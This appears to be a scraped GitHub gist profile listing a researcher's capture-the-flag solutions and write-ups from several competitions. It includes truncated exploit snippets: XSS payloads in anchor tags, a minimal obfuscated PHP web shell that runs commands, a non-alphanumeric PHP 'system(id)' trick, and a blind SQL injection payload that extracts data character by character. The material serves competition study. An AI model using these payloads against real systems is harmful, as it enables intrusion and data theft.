Skip to content

Instantly share code, notes, and snippets.



View GitHub Profile
terjanq /
Last active Jun 18, 2022
A TL;DR solution to Security Driven by @terjanq

A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only admin had access to it, because the file was private.

Disclamer: The write-up is written on airplane therefore the quality of it is poor, mostly to showcase the required steps to solve the challenge

terjanq /
Last active May 20, 2021
Politer Note - writeup



<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
terjanq /
Last active Oct 23, 2021
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
terjanq / scriptless_solve.html
Last active Jun 13, 2020
Solution to Scriptless challenge from Pwn2win 2020 CTF
View scriptless_solve.html
Quasi-scriptless (3 solves)
terjanq / rev_shell.php
Last active Mar 17, 2022
The shortest non-alphanumeric reverse shell script (19 bytes)
View rev_shell.php
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
* Explanation:
View funny.php
/* system(id) */
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
terjanq /
Last active Apr 20, 2020
Stegasaurus Ccratch solution (PlaidCTF 2020)
# The solution comes from the paper
# Which I got from p4 team.
import random
from math import factorial
MAX_VAL = 40000
# get random 8 integers
terjanq /
Created Dec 29, 2019
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
terjanq / car_repair.js
Created Oct 24, 2019
Solutions from hacklu 2019 CTF
View car_repair.js
* This is a solution to "Car repair shop" challenge from ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
terjanq / exploit.js
Last active Jan 12, 2020
This is a solution of Oracle v2 and Oracle v1 from (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
View exploit.js
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = ''
// Generates definitions for fonts
function generateFonts() {